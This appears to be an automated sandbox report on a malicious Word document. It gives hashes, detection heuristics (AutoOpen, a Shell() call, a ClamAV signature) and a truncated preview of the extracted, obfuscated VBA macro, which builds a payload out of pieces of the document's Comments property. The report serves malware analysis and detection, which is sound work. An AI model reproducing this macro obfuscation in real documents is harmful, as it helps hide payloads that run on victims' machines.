Office (OLE) malware analysis — malicious · 57794867310c0c67

MALICIOUS

Office (OLE)

82.0 KB Created: 2017-10-11 21:34:00 Authoring application: Microsoft Office Word First seen: 2017-10-28

MD5: 1549333bbc2ca45390d73c7876ef7704 SHA-1: 0a456e5f7f7fb43b0d017ec752af986330cceebe SHA-256: 57794867310c0c673a34eccea666780b09287f8ca42e4c5aadd21abec43d8168

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. This is further supported by the ClamAV detection name 'Doc.Macro.DollarShell-6346616-0', which suggests a known malicious macro pattern. The macro's obfuscated nature and reliance on document properties for payload construction make detailed analysis of its exact execution path difficult, but the intent to execute a secondary payload is clear.

Heuristics 7

ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8969 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8969 bytes
SHA-256: `d3e3670f64e16c68a203d900ec4afc8e85c6e5370513c10cbb81a6686b82ced3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub TNIChFsWZ() HJrXZ = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 3371), 50) mwVljniCj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 15168, 13) ajdfdji = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15104), 197) QJtIHCn = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 10669), 38) nBPOwIrvu = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14399, 91) pozKGjzZb = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7577, 157) ojoPd = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10894), 6) djAYUt = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13021), 113) MjVni = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3604, 173) OcbJiC = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7831), 114) OhBfM = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7132), 171) hiojQqiQ = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 3450), 73) zEXQE = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 2092), 110) RdRLnUUJFdm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7019, 76) NBSmBqw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5604, 100) VjLHClwA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 17139), 133) tDOiSO = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15897), 151) hzfRjL = HJrXZ + mwVljniCj + ajdfdji + QJtIHCn + nBPOwIrvu + pozKGjzZb + ojoPd + djAYUt + MjVni + OcbJiC + OhBfM + hiojQqiQ + zEXQE + RdRLnUUJFdm + NBSmBqw + VjLHClwA + tDOiSO zPzTzXHj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4465, 153) NJrmGJpL = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 2310), 100) vDEUalPO = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11233), 186) NFUQcmucmN = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 12108), 189) LYfwpNZIt = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11656, 46) SjtKisOIsn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3083, 181) HobKUO = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5120, 102) CQOsfpbv = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 14211), 138) QjXEOuTM = hzfRjL + zPzTzXHj + NJrmGJpL + vDEUalPO + NFUQcmucmN + LYfwpNZIt + SjtKisOIsn + HobKUO + CQOsfpbv DFtfZn = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 5426), 82) BioRTGD = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4890), 94) zsmrb = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 17836), 64) dCzCUYSSQjw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1275, 86) MocARjzbSD = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 18159, 47) qTPfYX = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11821), 36) vCXqzw = Right(Left(ActiveDocument.BuiltInDocume ... (truncated)

SHA-256: d3e3670f64e16c68a203d900ec4afc8e85c6e5370513c10cbb81a6686b82ced3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub TNIChFsWZ()
HJrXZ = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 3371), 50)
mwVljniCj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 15168, 13)
ajdfdji = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15104), 197)
QJtIHCn = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 10669), 38)
nBPOwIrvu = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14399, 91)
pozKGjzZb = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7577, 157)
ojoPd = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10894), 6)
djAYUt = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13021), 113)
MjVni = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3604, 173)
OcbJiC = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7831), 114)
OhBfM = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7132), 171)
hiojQqiQ = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 3450), 73)
zEXQE = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 2092), 110)
RdRLnUUJFdm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7019, 76)
NBSmBqw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5604, 100)
VjLHClwA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 17139), 133)
tDOiSO = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15897), 151)
hzfRjL = HJrXZ + mwVljniCj + ajdfdji + QJtIHCn + nBPOwIrvu + pozKGjzZb + ojoPd + djAYUt + MjVni + OcbJiC + OhBfM + hiojQqiQ + zEXQE + RdRLnUUJFdm + NBSmBqw + VjLHClwA + tDOiSO
zPzTzXHj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4465, 153)
NJrmGJpL = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 2310), 100)
vDEUalPO = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11233), 186)
NFUQcmucmN = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 12108), 189)
LYfwpNZIt = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11656, 46)
SjtKisOIsn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3083, 181)
HobKUO = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5120, 102)
CQOsfpbv = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 14211), 138)
QjXEOuTM = hzfRjL + zPzTzXHj + NJrmGJpL + vDEUalPO + NFUQcmucmN + LYfwpNZIt + SjtKisOIsn + HobKUO + CQOsfpbv
DFtfZn = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 5426), 82)
BioRTGD = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4890), 94)
zsmrb = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 17836), 64)
dCzCUYSSQjw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1275, 86)
MocARjzbSD = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 18159, 47)
qTPfYX = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11821), 36)
vCXqzw = Right(Left(ActiveDocument.BuiltInDocume
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.